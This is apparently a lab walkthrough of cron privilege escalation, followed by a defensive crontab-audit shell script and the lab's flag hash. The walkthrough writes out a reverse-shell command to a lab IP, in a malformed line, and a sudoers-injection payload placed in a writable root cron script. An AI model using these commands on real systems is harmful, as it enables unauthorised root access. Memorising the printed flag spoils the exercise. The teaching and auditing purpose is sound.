
Cron Jobs Gone Wild II

Overview

Cron is a lifesaver for admins when it comes to doing periodic maintenance tasks on the system. They can even be used in cases where tasks are performed within individual user directories. However, such automations need to be used with caution or can lead to easy privilege escalation attacks.

In this lab environment, you will be provided with GUI access to a Kali machine. A terminal access to the target machine is provided at target.ine.local:8000, which you can access over the browser in Kali.

Objective: Your mission is to get a root shell on the box and retrieve the flag!

Walkthrough

Following the video, I see an inaccessible file called message in the student home directory. I also see that crontab -l does not work, so I use grep to search for scripts that use that message file.

student@target:~$ grep /usr -r -e "/home/student/message"
/usr/local/share/copy.sh:cp /home/student/message /tmp/message
student@target:~$ cat /usr/local/share/copy.sh
#! /bin/bash
cp /home/student/message /tmp/message
chmod 644 /tmp/message

I check that I have write permission on copy.sh; it is probably triggered by a cron job. I notice there is neither nano nor vim to edit the file, so I use echo. The goal is to put our user in sudoers with NOPASSWD permissions.

student@target:~$ echo "#! /bin/bash\necho "/bin/bash -i >& /dev/tcp/192.168.106.2/9001 0>&1
student@target:~$ echo -e "#! /bin/bash\necho 'student ALL=NOPASSWD:ALL'>>/etc/sudoers" > /usr/local/share/copy.sh
student@target:~$ /usr/local/share/copy.sh
/usr/local/share/copy.sh: line 2: /etc/sudoers: Permission denied
student@target:~$ sudo su
root@target:/home/student#

The flag is in root's directory.
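The weakness this walkthrough exploits is a script that root's cron runs but an unprivileged user can edit. As an added example (not part of the original walkthrough or of the lab), the following POSIX shell audit walks a system-style crontab and flags exactly that class of problem: cron-run scripts that are group or world writable, that sit in a world-writable directory without the sticky bit, that are owned by neither root nor the cron user, or that do not exist yet. It assumes GNU coreutils for stat -c. The crontab and scripts it checks are constructed in a temporary directory, with the current user standing in for root in the user field, so it runs offline and touches nothing on the host.

```shell
#!/bin/sh
# Added example, not code from the original walkthrough or the lab.
# Audits the scripts a system-style crontab runs and reports the
# misconfiguration exploited above: a script run by a privileged cron
# user that someone else can modify or replace.
# Assumes GNU coreutils (stat -c). Everything checked below is constructed
# in a temporary directory; no real crontab or script is read or changed.

# check_script FILE CRONUSER
# Prints one "UNSAFE ..." line per problem, nothing if the file is acceptable.
# Returns 0 when clean, 1 when at least one problem was found.
check_script() {
  f=$1; cronuser=$2; bad=0
  if [ ! -e "$f" ]; then
    echo "UNSAFE $f: missing (if its directory is writable, anyone can create it)"
    return 1
  fi
  mode=$(stat -c '%a' "$f")        # octal permission bits, e.g. 777
  owner=$(stat -c '%U' "$f")       # owner name
  dir=$(dirname "$f")
  dirmode=$(stat -c '%a' "$dir")
  # group (020) or world (002) write bit on the script itself
  if [ $(( 0$mode & 022 )) -ne 0 ]; then
    echo "UNSAFE $f: mode $mode is group/world writable"; bad=1
  fi
  # world-writable parent directory without the sticky bit: the file can be replaced
  if [ $(( 0$dirmode & 02 )) -ne 0 ] && [ $(( 0$dirmode & 01000 )) -eq 0 ]; then
    echo "UNSAFE $f: parent $dir (mode $dirmode) is world writable"; bad=1
  fi
  # only root and the cron user should be able to edit what runs as the cron user
  if [ "$owner" != root ] && [ "$owner" != "$cronuser" ]; then
    echo "UNSAFE $f: runs as $cronuser but is owned by $owner"; bad=1
  fi
  return $bad
}

# audit_crontab FILE
# Walks a system-style crontab (minute hour dom month dow USER COMMAND, or
# @reboot/@daily USER COMMAND) and checks every absolute command path.
# Prints findings; returns 0 if everything is clean, 1 otherwise.
audit_crontab() {
  file=$1; rc=0
  while IFS= read -r line || [ -n "$line" ]; do
    case "$line" in
      ''|'#'*|[A-Za-z_]*) continue ;;   # blank, comment, or VAR=value line
    esac
    set -f; set -- $line; set +f        # split on whitespace without glob expansion
    case "$1" in
      @*) cronuser=$2; cmd=$3 ;;        # @reboot, @daily, ...
      *)  cronuser=$6; cmd=$7 ;;
    esac
    [ -n "$cmd" ] || continue
    case "$cmd" in
      /*) check_script "$cmd" "$cronuser" || rc=1 ;;
      *)  echo "SKIP $cmd: not an absolute path, resolve it through cron's PATH by hand" ;;
    esac
  done < "$file"
  return $rc
}

# --- constructed demo environment (not a real crontab) ---
umask 022
DEMO=$(mktemp -d)
mkdir "$DEMO/share"; chmod 755 "$DEMO/share"
printf '#!/bin/sh\ncp /home/student/message /tmp/message\n' > "$DEMO/share/copy.sh"
chmod 777 "$DEMO/share/copy.sh"          # the lab's misconfiguration: anyone can edit it
printf '#!/bin/sh\nlogrotate /etc/logrotate.conf\n' > "$DEMO/share/rotate.sh"
chmod 755 "$DEMO/share/rotate.sh"        # correctly locked down
ME=$(id -un)                             # stands in for "root" in the user field
cat > "$DEMO/crontab" <<EOF
# constructed system crontab
SHELL=/bin/sh
*/5 * * * * $ME $DEMO/share/copy.sh
@daily      $ME $DEMO/share/rotate.sh
0 3 * * *   $ME $DEMO/share/missing.sh
EOF

# Runs the audit over the constructed crontab; expected: copy.sh and
# missing.sh are reported, rotate.sh is silent.
demo_findings() { audit_crontab "$DEMO/crontab"; }

demo_findings || echo "audit found problems"
```

On a real host, point audit_crontab at /etc/crontab and at each file under /etc/cron.d; the walkthrough's copy.sh would show up on the "group/world writable" line. The same check_script call applied to every file in /etc/cron.hourly, cron.daily and friends catches the equivalent problem in run-parts directories, and the parent-directory check is what catches the case where the script itself has sane permissions but can simply be replaced.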

Answer

697914df7a07bb9b718c8ed258150164